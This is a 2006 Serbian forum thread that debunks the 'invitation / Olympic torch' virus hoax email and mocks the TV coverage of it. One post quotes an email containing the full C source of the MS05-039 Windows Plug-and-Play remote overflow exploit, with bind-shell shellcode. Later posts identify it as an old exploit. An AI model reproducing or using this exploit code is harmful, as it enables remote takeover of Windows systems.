[ djalf @ 06.02.2006. 18:03 ] @
Telekom salje ovo svojim radnicima:

"MOLIM DA OVO OBAVEŠTENJE POŠALJEŠ SVIM TVOJIM PRIJATELJIMA SA TVOJE
KONTAKT ADRESE

Narednih dana morate paziti da ne otvarate mail zvan „invitation" ,
bez obzira ko vam to šalje, to je virus koji „otvara" olimpijsku
baklju, koja izgori tvrdi disk na pc. Ovaj virus dolazi će od osoba
koje imate u adresaru, zato morate ovaj mail poslati što više, jer
bolje je dobiti ovaj mail 25 puta, nego dobit virus i otvoriti ga. Ako
dobijete mail sa imenom „invitation" ne otvarajte ga nego odmah
isključite pc. To je najgori virus objavljen na CNN, klasificiran od
Microsofta kao virus najrazorniji ikad postojeći. Ovaj virus otkriven
je juče poslepodne od MCAfee te za taj virus još nema odbrane.Ovaj
virus uništava najjednostavnije sektor Zero tvrdog diska, gde je
vitalna informacija skrivena. Pošalji ovaj mail svima tebi poznatima,
kopiraj ovaj mail i pošalji prijateljima i drugima jer zapamti, ako
svima njima pošalješ, svi ostali imaćemo pomoći."

Znaci, oprez!!!
[ calexx @ 06.02.2006. 19:38 ] @
Malopre nešto slično javljaju u Dnevniku, sad Telekom šalje upozorenje ... može li neko od njih da konsultuje one koji se razumeju u viruse a ne da padaju na svaki hoax? Niko nije proguglao inače bi našao da je to isto javljeno letos i da je i tada McAfee upravo juče otkrio virus i da nema zaštite. Naravno, predlog je da se mejl prosledi svima koje znate i to što više puta.
Nekako mi je bilo uverljivije ono da ako pošaljem razglednicu na 5 adresa, uskoro će da mi se desi nešto lepo. Sve se menja, samo veverice i dalje ostaju iste.
[ malisha @ 06.02.2006. 19:47 ] @
posto sam ovih dana poslao dosta odgovora "briznim" ali beznadezno glupim i naivnim "korisnicima" racunara, evo citat:

Citat:

Izvinite, ali da li ste Vi procitali to pismo koje prosledjujete, da li ste razmislili koliko ima smisla to sto tamo pise i da li ste proverili na zvanicnom sajtu McAfee-ja da li je to istina?

Molim Vas da sad na isti nacin kao sto ste (zaista dobronamerno) obavestili i nas, obavestite i sve ostale kojim ste ovo isto pismo prosledili da je u pitanju obican HOAX (pogledajte na internetu sta to znaci) i da ga u potpunosti zanemare.

Mislim zaista kolika je verovatnoca da je ovo istina: "Ovaj virus unistava najjednostavnije sektor Zero tvrdog diska, gde je vitalna informacija skrivena" ??? Sta je sektor Zero?? Kakava je vitalna informacija sakrivena? Ovo je ocigledno pisao neko ko nema veze sa racunarima ali ocekuje da ce sa pozivanjem na zvucna imena poput CNN-a , Microsoft-a i McAfee-ja obezbediti kredibilnost i sakriti svoje elementarno nepoznavanje racunarske tehnologije i terminologije.

I na kraju sta? Ako i dobijete takav mail... ne treba vise nikad da ukljucite racunar??? Jer lepo kaze "odmah iskljucite pc"! A da ne kazem kolika je glupost "to je virus koji "otvara" olinpijsku baklju,koja izgori tvrdi disk na pc"!!! OliNpijsku baklju?!?!?! To je nesto sto cuci u svakom racunaru na svetu?!?! I moguce je pokrenuti nekim tamo virusom?!?!?

Na ovaj nacin sam samo pozeleo da Vam skrenem paznju da ne poverujete svemu sto dolazi u Vase sanduce iako je sa poznate adrese.


kad bi ljudi samo povremeno ukljucili mozak... 5 minuta dnevno... ahhhhh
[ Corey @ 06.02.2006. 21:51 ] @
Ali

Citat:
Ako
dobijete mail sa imenom „invitation" ne otvarajte ga nego odmah
isključite pc.


priceless
[ net_freek @ 06.02.2006. 22:06 ] @
Sta reci....a ne zaplakati...

http://www.google.com/translat...=es%7Cen&hl=en&ie=UTF8

Pozdrav
[ noviKorisnik @ 06.02.2006. 22:54 ] @
Lažna uzbuna. Lock.
[ boki @ 07.02.2006. 17:09 ] @
Posto se stvar previse prosirila stavljam ovo privremeno na TOP.

Da ponovim jos jednom: U PITANJU JE PREVARA. VIRUS NE POSTOJI.
[ time @ 08.02.2006. 07:54 ] @
pa ako je prevara sto stavljas u top covece?o cemu da se raspravlja?ili ovo treba da bude jos jedna od tema gde se pljuje po telekom-u?
[ Frane Marinković @ 08.02.2006. 08:39 ] @
Ma nije telekom ništa, ur hr je bilo na glavnim vjestima HRT-a upozorenje
[ Sauron @ 08.02.2006. 10:35 ] @
Ahahah...
Da znate kakva se frka digla u IzvrSnom Veću
suckers!
[ sergio77 @ 08.02.2006. 10:47 ] @
Citat:
Frane Marinković: Ma nije telekom ništa, ur hr je bilo na glavnim vjestima HRT-a upozorenje

Bilo je juce i na RTS-u u Dnevniku 2
LOL
[ calexx @ 08.02.2006. 10:50 ] @
Bilo je i ovde preksinoć u dnevniku pa je čak neki stručnjak ... komentarisao, žao mi je što nisam čuo šta je rekao. Ipak, sinoć su se izvinili zbog širenja neproverene informacije. Inače je masovna panika, malopre me zvala sestričina da proveri pošto su i u njenoj firmi o tome pričali pa dva dana nije smela da uključi PC. Eh da sam kao što nisam, mogu ovde lepe pare da se uzmu za zaštito od te opasne baklje.
[ boki @ 08.02.2006. 14:09 ] @
Neki lik je na TV-u pricao kao da su to verovatno napravili proizvodjaci hard diskova kako bi povecali prodaju :)
[ starisloven @ 08.02.2006. 14:22 ] @
Ala me je ova tema dobrano nasmijala. Prvo ono sa isključivanjem računara pa
sada ovo da nisu smjeli dva dana uključivati pc. Bože moj, kako smo glupi.
[ the.kum @ 08.02.2006. 16:39 ] @
Ne mogu da verujem da je bilo i na RTS-u (a i na HRT-u)! Kakvi bolidi, kakav amaterizam! I jos da im placamo 300 dinara mesecno, strasno...
[ Andrej Čvoro @ 08.02.2006. 21:38 ] @
Ovaj mail je malopre stigao mom drugu:

Code:
From :  invitation hdd <[email protected]>
Sent :  Wednesday, February 8, 2006 3:19 PM
To :  *********@hotmail.com, *********@hotmail.com
Subject :  INVITATION.HDD
 

HINGSIGHT !!!!!                      !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!HINGSIGHT !!!!!          
!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!! !!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!  !!!!!!!!!!!!
!!!!!!!!!! !!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!
/
/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h >
#endif


unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";


unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";



unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";



unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"

/* jmp over - entry point */
"\xEB\x08\x90\x90"

/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */

/* jmp ebx - umpnpmgr.dll
"\x6f\x36\x7a\x76" */

"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";


unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
unsigned long len;

len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '\x00';
*out-- = name[len];
}
}



int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];

#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif

printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t Universal Exploit + no crash shellcode\n\n\n");
printf("\t Copyright © 2005 .: houseofdabus :.\n\n\n");


if (argc < 3) {
printf("%s <host> <bind port>\n", argv[0]);
exit(0);
}

if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failed\n");
exit(0);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0',;



printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed\n");
exit(0);
}
printf("ok\n");

printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}

if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("\n[-] failed\n");
exit(0);
}

if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}

ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;

sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;

smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);

if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}

printf("ok\n");
printf("[*] bind pipe...");

if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}

if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}

printf("ok\n");
printf("[*] sending crafted packet...");

// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));

// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;

// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);

// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
printf("ok\n");
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

recv(sockfd, recvbuf, 4096, 0);

return 0;
}



Meni ceo ovaj kod lici na neku paljevinu... O cemu se radi?
[ apex @ 08.02.2006. 22:41 ] @
HI HI HI kakva nebuloza za medalju

fali im jedna linija koda pa da dodam da znaju ljudi :

//PLEASE COMPILE THIS CODE USING SOME C COMPILER

HI HI HI :( Ovo sve mi bas lici na ono pomracenje sunca kao fol oslepecete ovo ono, ceo svet gleda a mi se zavukli u kuce i nabili masku od aparata za varenje na glavu :)

A ovo je neka globalna zajebavancija :) LOL
[ mulaz @ 08.02.2006. 22:52 ] @
loool :D

ovaj kod je mozda neki exploit.. ali kako vidite ima i 'shellcode' do, koji otvori shell na neom portu. ako ti spali hdd, sta ce onda nekome shell access. ja mislim da je to neki exploit, worm, virus nesto.. bilosta.. ali da spali hdd? lol :D
[ optix @ 09.02.2006. 00:27 ] @
Citat:
Andrej Čvoro:...
Meni ceo ovaj kod lici na neku paljevinu... O cemu se radi?



http://www.securiteam.com/exploits/5TP0C1FGKY.html

Dakle stari exploit za PnP, nema veze sa spaljivanjem diska i slicnim glupostima...

[Ovu poruku je menjao optix dana 09.02.2006. u 01:34 GMT+1]
[ Mister Big Time @ 14.02.2006. 16:27 ] @
bas lol... fali im kompLajNer...


A kakvu paniku napravise od ovoga, za 2 dana zvalo me je 20 ljudi u fazonu "aaa sta da radim jesi cuo za novi virus, aaa necu da palim komp nedelju dana!"
[ Pretender™ @ 01.03.2006. 16:21 ] @
O, Bože....koje špekulacije...
[ PiceCLuE @ 11.03.2006. 10:56 ] @
Video zapis priloga o virusu na RTS dnevniku i sutrašnje izvinjenje možete skinuti odavde.

[Ovu poruku je menjao PiceCLuE dana 11.03.2006. u 14:32 GMT+1]